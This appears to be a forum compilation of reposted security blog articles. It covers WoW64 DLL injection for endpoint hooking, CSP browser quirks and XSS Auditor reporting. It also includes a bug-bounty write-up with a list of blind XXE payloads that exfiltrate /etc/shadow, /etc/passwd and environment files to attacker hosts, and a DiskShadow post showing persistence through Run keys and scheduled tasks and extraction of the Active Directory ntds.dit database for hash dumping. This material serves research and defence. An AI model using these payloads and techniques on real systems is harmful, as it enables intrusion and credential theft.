  16. DEEP HOOKS: MONITORING NATIVE EXECUTION IN WOW64 APPLICATIONS – PART 1 By Yarden Shafir and Assaf Carlsbad - March 12, 2018 Introduction This blog post is the first in a three-part series describing the challenges one has to overcome when trying to hook the native NTDLL in WoW64 applications (32-bit processes running on top of a 64-bit Windows platform). As documented by numerous other sources, WoW64 processes contain two versions of NTDLL. The first is a dedicated 32-bit version, which forwards system calls to the WoW64 environment, where they are adjusted to fit the x64 ABI. The second is a native 64-bit version, which is called by the WoW64 environment and is eventually responsible for user-mode to kernel-mode transitions. Due to some technical difficulties in hooking the 64-bit NTDLL, most security-related products hook only 32-bit modules in such processes. Alas, from an attacker’s point of view, bypassing these 32-bit hooks and the mitigations offered by them is rather trivial with the help of some well-known techniques. Nonetheless, in order to invoke system calls and carry out various other tasks, most of these techniques would eventually call the native (that is, 64-bit) version of NTDLL. Thus, by hooking the native NTDLL, endpoint protection solutions can gain better visibility into the process’ actions and become somewhat more resilient to bypasses. In this post we describe methods to inject 64-bit modules into WoW64 applications. The next post will take a closer look at one of these methods and delve into the details of some of the adaptations required for handling CFG-aware systems. The final post of this series will describe the changes one would have to apply to an off-the-shelf hooking engine in order to hook the 64-bit NTDLL. When we started this research, we decided to focus our efforts mainly on Windows 10. 
All of the injection methods we present were tested on several Windows 10 versions (mostly RS2 and RS3), and may require a slightly different implementation if used on older Windows versions. Injection Methods Injecting 64-bit modules into WoW64 applications has always been possible, though there are a few limitations to consider when doing so. Normally, WoW64 processes contain very few 64-bit modules, namely the native ntdll.dll and the modules comprising the WoW64 environment itself: wow64.dll, wow64cpu.dll, and wow64win.dll. Unfortunately, 64-bit versions of commonly used Win32 subsystem DLLs (e.g. kernelbase.dll, kernel32.dll, user32.dll, etc.) are not loaded into the process’ address space. Forcing the process to load any of these modules is possible, though somewhat difficult and unreliable. Hence, as the first step of our journey towards successful and reliable injection, we should strip our candidate module of all external dependencies but the native NTDLL. At the source code level, this means that calls to higher-level Win32 APIs such as VirtualProtect() will have to be replaced with calls to their native counterparts, in this case – NtProtectVirtualMemory(). Other adaptations are also required and will be discussed in detail in the final part of this series. Figure 1 – a minimalistic DLL with only a single import descriptor (NTDLL) After we create a 64-bit DLL that adheres to these limitations, we can go on to review a few possible injection methods. Hijacking wow64log.dll As previously discovered by Walied Assar, upon initialization, the WoW64 environment attempts to load a 64-bit DLL, named wow64log.dll directly from the system32 directory. If this DLL is found, it will be loaded into every WoW64 process in the system, given that it exports a specific, well-defined set of functions. 
Since wow64log.dll is not currently shipped with retail versions of Windows, this mechanism can actually be abused as an injection method by simply hijacking this DLL and placing our own version of it in system32. Figure 2 – ProcMon capture showing a WoW64 process attempting to load wow64log.dll The main advantage of this method lies in its sheer simplicity – all it takes to inject the module is to deploy it to the aforementioned location and let the system loader do the rest. The second advantage is that loading this DLL is a legitimate part of the WoW64 initialization phase, so it is supported on all currently available 64-bit Windows platforms. However, there are a few possible downsides to this method: First, a DLL named wow64log.dll may already exist in the system32 directory, even though (as mentioned above) it’s not there by default. Second, this method provides little to no control over the injection process as the underlying call to LdrLoadDll() is ultimately issued by system code. This limits our ability to exclude certain processes from injection, specify when the module will be loaded, etc. Heaven’s Gate More control over the injection process can be achieved by simply issuing the call to LdrLoadDll() ourselves rather than letting a built-in system mechanism call it on our behalf. In reality, this is not as straightforward as it may seem. As one can correctly assume, the 32-bit image loader will refuse any attempt to load a 64-bit image, stopping this course of action dead in its tracks. Therefore, if we wish to load a native module into a WoW64 process we must somehow go through the native loader. We can do this in two stages: Gain the ability to execute arbitrary 32-bit code inside the target process. Craft a call to the 64-bit version of LdrLoadDll(), passing the name of the target DLL as one of its arguments.
Given the ability to execute 32-bit code in the context of the target process (for which a plethora of ways exist), we still need a method by which we can call 64-bit APIs freely. One way to do this is by utilizing the so-called “Heaven’s Gate”. “Heaven’s Gate” is the commonly used name for a technique which allows 32-bit binaries to execute 64-bit instructions, without going through the standard flow enforced by the WoW64 environment. This is usually done via a user-initiated control transfer to code segment 0x33, that switches the processor’s execution mode from 32-bit compatibility mode to 64-bit long mode. Figure 3 – a thread executing x86 code, just prior to its transition to x64 realm. After the jump to the x64 realm is made, the option of directly calling into the 64-bit NTDLL becomes readily available. In the case of exploits and other potentially malicious programs, this allows them to avoid hitting hooks placed on 32-bit APIs. In the case of DLL injectors, though, this solves the problem at hand as it opens up the possibility of calling the 64-bit version of LdrLoadDll(), capable of loading 64-bit modules. Figure 4 – for demonstration purposes, we used the Blackbone library to successfully inject a 64-bit module into a WoW64 process using Heaven’s Gate. We will not go into any more detail about specific implementations of “Heaven’s Gate”, but the inquisitive reader can learn more about it here. Injection via APC With the ability to load a kernel-mode driver into the system, the arsenal of injection methods at our disposal grows significantly. Among these methods, the most popular is probably injection via APC: It is used extensively by some AV vendors, malware developers and presumably even by the CIA. In a nutshell, an APC (Asynchronous Procedure Call) is a kernel mechanism that provides a way to execute a custom routine in the context of a particular thread. 
Once dispatched, the APC asynchronously diverts the execution flow of the target thread to invoke the selected routine. APCs can be classified as one of two major types: Kernel-mode APCs: The APC routine will eventually execute kernel-mode code. These are further divided into special kernel-mode APCs and normal kernel-mode APCs, but we will not go into detail about the nuances separating them. User-mode APCs: The APC routine will eventually execute user-mode code. User-mode APCs are dispatched only when the thread owning them becomes alertable. This is the type of APC we’ll be dealing with in the rest of this section. APCs are mostly used by system-level components to perform various tasks (e.g. facilitate I/O completion), but can also be harnessed for DLL injection purposes. From the perspective of a security product, APC injection from kernel-space provides a convenient and reliable method of ensuring that a particular module will be loaded into (almost) every desired process across the system. In the case of the 64-bit NT kernel, the function responsible for the initial dispatch of user-mode APCs (for native 64-bit processes as well as WoW64 processes) is the 64-bit version of KiUserApcDispatcher(), exported from the native NTDLL. Unless explicitly requested otherwise by the APC issuer (via PsWrapApcWow64Thread()) the APC routine itself will also execute 64-bit code, and thus will be able to load 64-bit modules. The classic way of implementing DLL injection via APC revolves around the use of a so-called “adapter thunk”. The adapter thunk is a short snippet of position-independent code written to the address space of the target process. 
Its main purpose is to load a DLL from the context of a user-mode APC, and as such it will receive its arguments according to the KNORMAL_ROUTINE specification: Figure 5 – the prototype of a user-mode APC procedure, taken from wdm.h As can be seen in the figure above, functions of type KNORMAL_ROUTINE receive three arguments, the first of which is NormalContext. Like many other “context” parameters in the WDM model, this argument is actually a pointer to a user-defined structure. In our case, we can use this structure to pass the following information into the APC procedure: The address of an API function used to load a DLL. In WoW64 processes this has to be the native LdrLoadDll(), as the 64-bit version of kernel32.dll is not loaded into the process so using LoadLibrary() and its variants is not possible. The path to the DLL we wish to load into the process. Once the adapter thunk is called by KiUserApcDispatcher(), it unpacks NormalContext and issues a call to the supplied loader function with the given DLL path and some other, hardcoded arguments: Figure 6 – A typical “adapter thunk” set as the target of a user-mode APC To use this technique to our benefit, we wrote a standard kernel-level APC injector and modified it in a way that should support injection of 64-bit DLLs into WoW64 processes (shown in Appendix A). Although the approach looked promising, when we attempted to inject our DLL into any CFG-aware WoW64 process, the process crashed with a CFG validation error. Figure 7 – A CFG validation error caused by the attempt to call the adapter thunk Next Post: In the next post we will delve into some of the implementation details of CFG to help grasp why this injection method fails, and present several possible solutions to overcome this obstacle. Appendixes Appendix A – complete source code for APC injection with adapter thunk Sursa: https://www.sentinelone.com/blog/deep-hooks-monitoring-native-execution-wow64-applications-part-1/
  17. Posted on March 24, 2018 by tghawkins

Today, I’d like to share the methodology behind how I found a blind, out-of-band XML external entity (XXE) vulnerability in a private bug bounty program. I have redacted the necessary information to hide the program’s identity.

As with the beginning of any hunter’s quest, thorough recon is necessary to identify as many in-scope assets as possible. Through this recon, I was able to discover a subdomain that caught my interest. I then brute forced the directories of the subdomain and found the endpoint /notifications. Visiting this endpoint via a GET request resulted in the following page:

In the response I noticed the XML content-type along with an XML body containing XML SOAP syntax. Since I had no GET parameters to test, I decided to issue a POST request to the endpoint, and found that the body of the response had disappeared, with a response code of 200.

Since the web application seemed to respond well to the POST request, instead of issuing a 405 Method Not Allowed error, I decided to issue a request containing XML syntax with the content-type application/xml.

The resulting response was also different than in the previous cases. This response was in XML, as it was when issuing the GET request to this endpoint. However, this time the value within the tags is “OK” instead of the original value “TestRequestCalled”. I also tried sending a JSON request to see how the application would respond. Below is the result.

Since the response was blank, as it was when issuing a POST request with no specified content type, I had a strong belief that the endpoint was processing XML data. This was enough for me to set up my VPS to host a DTD file for the XML processor to “hopefully” parse. Below is the result of the DTD being successfully processed, with the requested file contents appended.
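The probing sequence described above (plain GET, POST without a body type, POST with XML, POST with JSON) can be written down as a small set of request templates. The following Python sketch only builds the requests and does not send them. The URL, the XML body and the JSON body are placeholders invented for illustration; the original post does not show the exact requests that were used.

```python
import json
import urllib.request

# Hypothetical placeholder; the real host was redacted in the write-up.
ENDPOINT = "https://target.example/notifications"


def build_probes(url):
    """Return the four probe requests, keyed by a short label."""
    xml_body = b'<?xml version="1.0"?><r>test</r>'        # assumed minimal XML
    json_body = json.dumps({"test": 1}).encode("utf-8")   # assumed minimal JSON
    return {
        "get": urllib.request.Request(url, method="GET"),
        # No Content-Type is set here. Note that urllib adds
        # application/x-www-form-urlencoded by default when the request is sent.
        "post_empty": urllib.request.Request(url, data=b"", method="POST"),
        "post_xml": urllib.request.Request(
            url, data=xml_body, method="POST",
            headers={"Content-Type": "application/xml"},
        ),
        "post_json": urllib.request.Request(
            url, data=json_body, method="POST",
            headers={"Content-Type": "application/json"},
        ),
    }


if __name__ == "__main__":
    for label, request in build_probes(ENDPOINT).items():
        content_type = request.get_header("Content-type", "(none)")
        print(label, request.get_method(), content_type)
```

Comparing status code, response content type and body length across the four probes is what suggested, in the write-up, that only the XML request was actually being parsed.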
I also used this script to set up an FTP server and have it listening, so I would also be able to extract the server’s information/file contents through the FTP protocol: https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb

Although this submission was marked as a duplicate, I wanted to share this finding as it was a good learning experience, and I was able to examine how the application was responding to certain inputs without knowing its exact purpose/functionality. The original reporter had not been able to extract information from the server, and received $8k for this issue.

Some helpful XXE payloads:

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

## External dtd: ##
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

----------------------------------------------------------------
OoB variation of above (seems to work better against .NET)
----------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
%exfil;
]>

## External dtd: ##
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/shadow">
<!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd">
%sp;
%param3;
%exfil;
]>

## External dtd: ##
<!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://Evilhost:port/%data3;'>">

-----------------------------------------------------------------------
OoB extra ERROR -- Java
-----------------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/passwd">
<!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd">
%sp;
%param3;
%exfil;
]>
<r></r>

## External dtd: ##
<!ENTITY % param1 '<!ENTITY &#x25; external SYSTEM "file:///nothere/%payload;">'>
%param1;
%external;

-----------------------------------------------------------------------
OoB extra nice
-----------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
<root>&all;</root>

## External dtd: ##
<!ENTITY all "%start;%stuff;%end;">

------------------------------------------------------------------
File-not-found exception based extraction
------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
%one;
%two;
%four;
]>

## External dtd: ##
<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">
-------------------------^ you might need to encode this % (depends on your target) as: &#x25;

--------------
FTP
--------------
<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
%asd;
%c;
]>
<a>&rrr;</a>

## External dtd ##
<!ENTITY % d SYSTEM "file:///proc/self/environ">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">

---------------------------
Inside SOAP body
---------------------------
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>

---------------------------
Untested - WAF Bypass
---------------------------
<!DOCTYPE :. SYTEM "http://"
<!DOCTYPE :_-_: SYTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"

Sursa: https://hawkinsecurity.com/2018/03/24/gaining-filesystem-access-via-blind-oob-xxe/
  18. Stefan Matsson 2018-03-26 # Security

CSP IMPLEMENTATIONS ARE BROKEN

TL;DR
frame-src is inconsistent cross browser
block-all-mixed-content is broken in Chrome and Opera
CSP reports are inconsistent
Edge has some weird edge cases (no pun intended)

INTRO
There has been a lot of talk lately about Content Security Policy (CSP) after an accessibility script called BrowseAloud was infected by a cryptominer and forced the users of a couple of thousand websites to mine cryptocurrency without their knowledge. Content Security Policy could have prevented this issue, as it contains rules for what the browser may and may not load. Read more at https://content-security-policy.com

I recently gave a talk titled “Content Security Policy - Or how we ruined our site, learned a lesson, broke the site again and then fixed it”. The talk was based on my work at my current client. This post is a summary of sorts of that talk and outlines some of the issues we found in different browsers and with different combinations of devices, OSs, browsers, extensions and whatnot.

SOME INFO ON THE SYSTEM WE ARE BUILDING
My client provides payment services for e-commerce. The system is loaded as an iframe on the e-commerce site and allows the customer to finish their purchase. We use features that require CSP2 (e.g. script hashes). Our system in turn loads an iframe from a trusted service provider (let’s call it SystemX). SystemX will in some cases redirect to one of their trusted providers. SystemX has literally hundreds of trusted providers all over the world, and each of these has its own page that must be loaded in the iframe. I will not go into more detail on why, so as not to reveal too much information about my client.

FRAME-SRC IS INCONSISTENT CROSS BROWSER
If your CSP contains a frame-src directive that does not include mailto: or tel:, such links will be blocked inside the iframe in all browsers except Firefox and Edge.
Firefox will open both links, and Edge will open the mailto link but block the tel link. I’m not really sure whether it’s broken in Firefox or in the other browsers; there are valid arguments for both cases.

Workaround: Add mailto: and tel: to your CSP:
frame-src 'self' mailto: tel:

I have reported this to Microsoft but have not heard back.

Affected browsers: Firefox and Edge, or all others, depending on your point of view
Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/mailto-and-tel-links-frame-src/

EDGE AND CUSTOM ERROR PAGES
We load an iframe from a trusted service provider, which in turn redirects to different sites depending on circumstances. As we cannot know which URLs will be redirected to, we currently use this frame-src in our CSP:
frame-src 'self' data: https:

The issue with Edge is that it loads custom error pages for issues such as DNS errors, SmartScreen blocking and error responses from the server (e.g. 400, 404, 500 etc). The error page is loaded via an ms-appx-web:// URL (e.g. ms-appx-web:///assets/errorpages/http_500.htm), which is blocked by the CSP, and a blank page is displayed to the user. The result is that our service provider’s iframe is just blank if an error occurs. I reported this issue to Microsoft in early March but have not heard anything back from them.

Workaround: Add ms-appx-web: to our frame-src:
frame-src 'self' data: https: ms-appx-web:

Affected browsers: Edge
Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/edge-ms-appx-web-frame-src/

EDGE AND EXTENSIONS
Extensions installed in Edge are subject to the current page’s content security policy. Basically, any installed extension that tries to do anything, from loading images to loading JS, will fail, and a CSP violation will be logged. According to the CSP spec this is wrong. The issue has been fixed but not yet released, according to the Edge issue tracker (issue 1132012).
Affected browsers: Edge

BLOCK-ALL-MIXED-CONTENT BLOCKS TEL AND MAILTO LINKS IN IFRAMES BUT NOT IN THE PARENT PAGE
If you serve your site over HTTPS and use the block-all-mixed-content directive in your CSP, mailto and tel links will be blocked inside iframes but not on your main page. This does not happen if you serve the site over HTTP. If the user clicks a mailto or tel link on your page (i.e. the parent page) it will work as intended. Clicking the same links in an iframe will log one of these two errors:

Mixed Content: The page at 'https://...' was loaded over HTTPS, but requested an insecure resource 'mailto:...'. This request has been blocked; the content must be served over HTTPS.
Mixed Content: The page at 'https://...' was loaded over HTTPS, but requested an insecure resource 'tel:...'. This request has been blocked; the content must be served over HTTPS.

This issue has been reported to Google and Opera. Opera has not yet responded.

Workaround: Remove block-all-mixed-content from your CSP (possibly use upgrade-insecure-requests instead)
Affected browsers: Chrome and Opera
Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/mailto-and-tel-link-block-all-mixed-content/

SAFARI ON OLDER IOS DEVICES DOES NOT SUPPORT CSP2
“Older” in this case means iOS 9 or earlier. Safari on iOS 10 and 11 does support CSP2. Since we require the use of script hashes, we also require CSP2. Desktop Safari is also affected, but this is not as big a problem, as most desktops are up to date. Current usage on our site is less than 0.9% for older Safari on desktop.

Workaround: There is no way to make this work, so we have disabled CSP for older iOS devices using user agent sniffing.
Affected browsers: Safari on iOS < 10 (both iPhone and iPad) and Safari 9 or earlier on desktop

INTERNET EXPLORER 11 ONLY SUPPORTS X-CONTENT-SECURITY-POLICY AND CSP1
IE11 supports CSP1 using the X-Content-Security-Policy header.
If you wish to support IE11 you need to either do some user agent sniffing and change the header from Content-Security-Policy to X-Content-Security-Policy, or send out both headers for everyone. In our case we barely have any customers on IE11 so we just send out the regular Content-Security-Policy header, which is then ignored by IE11.

Affected browsers: Internet Explorer 11 (older versions do not support CSP)

CSP REPORTS DIFFER BETWEEN BROWSERS

The reports sent to your report-uri should follow a common standard defined in the CSP spec, but browsers differ on what data they send.

Some versions of Safari include the entire CSP in the violated-directive property. This is like saying “Something went wrong. You find out what and deal with it.”

Chrome on Android sometimes does not provide a blocked-uri when the violated-directive is frame-src. This means that we have no way of knowing what URL was blocked in the iframe.

Most browsers do not provide a script-sample when an inline script is blocked. script-sample is very helpful in debugging what script was blocked.

CSP REPORTS CONTAIN LOTS OF FALSE POSITIVES

This is primarily due to browser extensions. Most extensions work by injecting code on the page, and code on the page is subject to the page’s CSP. A common issue we have found in our logs is

    violated-directive: script-src
    blocked-uri: about:blank

which is caused by adblockers when they replace the loading of tracking scripts (e.g. Google Analytics) with the loading of about:blank.

SUMMARY

Content Security Policy is a great tool that should be deployed in more places. It does however take some fine tuning to make it work properly on a specific site.

Sursa: https://jellyhive.com/activity/posts/2018/03/26/csp-implementations-are-broken/
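The report differences and false positives described in the article above can be handled with a small triage step on the receiving end. The following is only a sketch under stated assumptions: it assumes reports arrive as JSON with a top-level "csp-report" object, and the function name and output keys are invented for illustration. It marks a report as ambiguous when violated-directive looks like a whole policy or blocked-uri is missing, and flags the script-src / about:blank pattern attributed to adblockers.

```python
import json


def triage_csp_report(raw: str) -> dict:
    """Reduce a CSP violation report to a few comparable fields.

    Hypothetical helper: the output keys are illustrative, not part of any spec.
    """
    report = json.loads(raw).get("csp-report", {})
    directive = report.get("violated-directive", "").strip()
    blocked = report.get("blocked-uri", "")

    # A ';' means several directives were sent, i.e. the browser dumped the
    # whole policy instead of naming the single directive that was violated.
    whole_policy = ";" in directive
    name = "" if whole_policy or not directive else directive.split()[0]

    return {
        "directive": name,
        "blocked_uri": blocked,
        "ambiguous": whole_policy or not blocked,
        "likely_extension_noise": name == "script-src" and blocked == "about:blank",
    }
```

Reports flagged as likely extension noise could be counted separately rather than discarded, so a real regression that happens to match the pattern is still visible.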
  19. Introducing XSS Auditor reporting to Report URI

March 26, 2018

Whilst we already have support for CSP reports over at Report URI, there is another potential source of information about XSS attacks that may be attempted or happening on your site. The X-XSS-Protection header allows you to configure the XSS Auditor, decide what action it should take and request that the auditor send reports if action is required. We now support XSS Auditor reporting on Report URI!

The XSS Auditor

The XSS Auditor runs whilst HTML is being parsed and attempts to find reflected XSS attacks against the user. If it finds a possible attack the Auditor can take no action, it can filter what it thinks is the attack payload or it can refuse to render the page at all. You can find more details about the XSS Auditor, which is present in Chromium and WebKit, so there is a good share of browsers that have one.

Configuring the Auditor

The default configuration for the XSS Auditor varies depending on which version of which browser you're using, of course, but configuring it is easy enough. You can control the auditor with the X-Xss-Protection header with a few simple values. You can read more detail about configuring the auditor in my blog post Hardening your HTTP response headers and you can test to see if your site, or any other site, has it deployed properly using securityheaders.io. No matter which configuration you use, as long as you have the auditor enabled, it can send reports about the action it takes.

    X-Xss-Protection: 1; mode=block; report=https://{subdomain}.report-uri.com/r/d/xss/enforce

XSS Reports

Whilst the original purpose of CSP was to defend against XSS attacks, and it can do that very successfully, if you have both CSP and XXP (X-Xss-Protection) deployed you can benefit from an even better level of protection. There's no reason to think you don't need one if you have the other, leverage the protection of both!
Whether you do or don't have CSP deployed, you can deploy XXP and have the Auditor stop attacks before they even take place. If CSP is a last line of defence in the browser then XXP is an additional, penultimate line of defence. With the auditor configured, if it sees any kind of reflected XSS attack on your site it will send a report that looks like this.

    {
      "xss-report": {
        "request-url": "https://scotthelme.co.uk/introducing-xss-reporting-to-report-uri/?search=%3Cscript%3Ealert(123);%3C/script%3E",
        "request-body": ""
      }
    }

This is a great report to receive and it will tip you off about a likely issue on one of your pages. The good thing about the report is that it won't be sent if the browser doesn't find the content of the GET parameter reflected somewhere in the page, so the false positive rate should be fairly low. You might see some novel attacks against your users, find some nifty XSS payloads or just rest assured knowing that if the browser thinks there's a problem then it will tell you. Deploy it alongside CSP, before CSP or after CSP, it doesn't really matter, but it's available now and you should go check it out.

Support

The XSS Auditor can send reports from Chromium and WebKit based browsers, which gives us a pretty high level of visibility. WebKit will happily send those reports right now but Chrome does have a small interruption in service at present. You can read more in the Chromium Bug but Chrome will begin sending reports again during April, so we will be back on track there. The great thing about reporting mechanisms like this is that we can still get value from the feature even without 100% browser support. There are a lot of WebKit browsers out there and they may be able to tell you something useful.

Other Updates

We've also released a few other features here and there over the last couple of months so I wanted to detail those too.
The list is far from exhaustive but here's a few:

When filtering your reports on the Reports page, the filter is now reflected into the URL. This means you can bookmark/share/save filters for more convenient use in the future. Back/forward navigation also works as expected.

After the recent update that introduced wildcard queries in the hostname and path fields, we've also introduced a 'not' filter that does exactly what you'd expect.

We've made some improvements to our filtering for inbound reports. There's now less noise making it through to your account and we have special handling in place for a few browser bugs so reports will make more sense overall.

There have been countless UI tweaks and improvements to make the browsing experience better including series highlighting and toggling on the graphs page, better sorting on the Reports tables, Team invite emails, performance improvements and much more!

After launching XSS Auditor Reporting today we've started our 7 day countdown to our next feature launch which is going to be a big one. I'm really excited about the launch next week and I'm hoping everyone will love the new feature as much as we do!

Sursa: https://scotthelme.co.uk/introducing-xss-reporting-to-report-uri/
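To make the report format from the article above concrete, here is a minimal sketch of how a receiving endpoint might summarise an XSS Auditor report. It assumes the body is JSON with an "xss-report" object holding "request-url" and "request-body", as in the sample report; the function name and the output keys are hypothetical.

```python
import json
from urllib.parse import unquote, urlsplit


def summarize_xss_report(raw: str) -> dict:
    """Pull the interesting parts out of an XSS Auditor report body."""
    report = json.loads(raw)["xss-report"]
    parts = urlsplit(report["request-url"])
    return {
        "host": parts.netloc,
        "path": parts.path,
        # Percent-decode the query string so the reflected payload is readable.
        "decoded_query": unquote(parts.query),
        "has_body": bool(report.get("request-body")),
    }
```

The decoded query is untrusted input by definition, so anything that displays it (a dashboard, an email alert) should escape it before rendering.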
  20. DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction

MARCH 26, 2018 ~ BOHOPS

[Source: blog.microsoft.com]

Introduction

Not long ago, I blogged about Vshadow: Abusing the Volume Shadow Service for Evasion, Persistence, and Active Directory Database Extraction. This tool was quite interesting because it was yet another utility to perform volume shadow copy operations, and it had a few other features that could potentially support other offensive use cases. In fairness, evasion and persistence are probably not the strong suits of Vshadow.exe, but some of those use cases may have more relevance in its replacement, DiskShadow.exe.

In this post, we will discuss DiskShadow, present relevant features and capabilities for offensive opportunities, and highlight IOCs for defensive considerations.

*Don’t mind the ridiculous title, it just seemed thematic

What is DiskShadow?

“DiskShadow.exe is a tool that exposes the functionality offered by the Volume Shadow Copy Service (VSS). By default, DiskShadow uses an interactive command interpreter similar to that of DiskRaid or DiskPart. DiskShadow also includes a scriptable mode.“ - Microsoft Docs

DiskShadow is included in Windows Server 2008, Windows Server 2012, and Windows Server 2016 and is a Windows signed binary. The VSS features of DiskShadow require privileged-level access (with UAC elevation). However, several command utilities can be invoked by a non-privileged user. This makes DiskShadow a very interesting candidate for command execution and evasive persistence.

DiskShadow Command Execution

As a feature, the interactive command interpreter and script mode support the EXEC command. As a privileged or an unprivileged user, commands and batch scripts can be invoked within Interactive Mode or via a script file.
Let’s demonstrate each of these capabilities:

Note: The following example is carried out under the context of a non-privileged/non-admin user account on a recently installed/updated Windows Server 2016 instance. Depending on the OS version and/or configuration, running this utility at a medium process integrity may fail.

Interactive Mode

In the following example, a normal user invokes calc.exe:

Script Mode

In the following example, a normal user invokes calc.exe and notepad.exe by calling the script option with diskshadow.txt:

    diskshadow.exe /s c:\test\diskshadow.txt

Like Vshadow, take note that DiskShadow.exe is the parent process of the spawned executable. Additionally, DiskShadow will continue to run until its child processes are finished executing.

Auto-Start Persistence & Evasion

Since DiskShadow is a Windows signed binary, let’s take a look at a few AutoRuns implications for persistence and evasion. In the following examples, we will update our script then create a RunKey and Scheduled Task.

Preparation

Since DiskShadow is “window forward” (e.g. pops a command window), we will need to modify our script in a way to invoke proof-of-concept pass-thru execution and close the parent DiskShadow and subsequent payloads as quickly as possible. In some cases, this technique may not be considered very stealthy if the window is opened for a lengthy period of time (which is good for defenders if this activity is noted and reported by users). However, this may be overlooked if users are conditioned to see such prompts at logon time.

Note: The following example is carried out under the context of a non-privileged/non-admin user account on a recently installed/updated Windows Server 2016 instance. Depending on the OS version and/or configuration, running this utility at a medium process integrity may fail.
First, let’s modify our script (diskshadow.txt) to demonstrate this basic technique:

    EXEC "cmd.exe" /c c:\test\evil.exe

*In order to support command switches, we must quote the initial binary with EXEC. This also works under Interactive Mode.

Second, let’s add persistence with the following commands:

- Run Key Value -

    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VSSRun /t REG_EXPAND_SZ /d "diskshadow.exe /s c:\test\diskshadow.txt"

- User Level Scheduled Task -

    schtasks /create /sc hourly /tn VSSTask /tr "diskshadow.exe /s c:\test\diskshadow.txt"

Let’s take a further look at these…

AutoRuns - Run Key Value

After creating the key value, we can see that our key is hidden when we open up AutoRuns and select the Logon tab. By default, Windows signed executables are hidden from view (with a few notable exceptions) as demonstrated in this screenshot:

After de-selecting “Hide Windows Entries”, we can see the AutoRuns entry:

AutoRuns - Scheduled Tasks

Like the Run Key method, we can see that our entry is hidden in the default AutoRuns view:

After de-selecting “Hide Windows Entries”, we can see the AutoRuns entry:

Extracting the Active Directory Database

Since we are discussing the usage of a shadow copy tool, let’s move forward to showcase (yet another) VSS method for extracting the Active Directory (AD) database, ntds.dit. In the following walk-through, we will assume successful compromise of an Active Directory Domain Controller (Win2k12) and are running DiskShadow under a privileged context in Script Mode.

First, let’s prepare our script. We have performed some initial recon to determine our target drive letter (for the logical drive that ‘contains’ the AD database) to shadow as well as discovered a logical drive letter that is not in use on the system.
Here is the DiskShadow script (diskshadow.txt):

    set context persistent nowriters
    add volume c: alias someAlias
    create
    expose %someAlias% z:
    exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
    delete shadows volume %someAlias%
    reset

[Helpful Source: DataCore]

In this script, we create a persistent shadow copy so that we can perform copy operations to capture the sensitive target file. By mounting a (unique) logical drive, we can guarantee a copy path for our target file, which we will extract to the ‘exfil’ directory before deleting our shadow copy identified by someAlias.

*Note: We can attempt to copy out the target file by specifying a shadow device name/unique identifier. This is slightly stealthier, but it is important to ensure that labels/UUIDs are correct (via initial recon) or else the script will fail to run. This use case may be more suitable for Interactive Mode.

The commands and results of the DiskShadow operation are presented in this screenshot:

    type c:\diskshadow.txt
    diskshadow.exe /s c:\diskshadow.txt
    dir c:\exfil

In addition to the AD database, we will also need to extract the SYSTEM registry hive:

    reg.exe save hklm\system c:\exfil\system.bak

After transferring these files from the target machine, we use SecretsDump.py to extract the NTLM Hashes:

    secretsdump.py -ntds ntds.dit -system system.bak LOCAL

Success! We have used another method to extract the AD database and hashes. Now, let’s compare and contrast DiskShadow and Vshadow…

DiskShadow vs. Vshadow

DiskShadow.exe and VShadow.exe have very similar capabilities. However, there are a few differences between these applications that may justify which one is the better choice for the intended operational use case. Let’s explore some of these in greater detail:

Operating System Inclusion

DiskShadow.exe is included with the Windows Server operating system since 2008. Vshadow.exe is included with the Windows SDK.
Unless the target machine has the Windows SDK installed, Vshadow.exe must be uploaded to the target machine. In a “living off the land” scenario, DiskShadow.exe has the clear advantage.

Utility & Usage

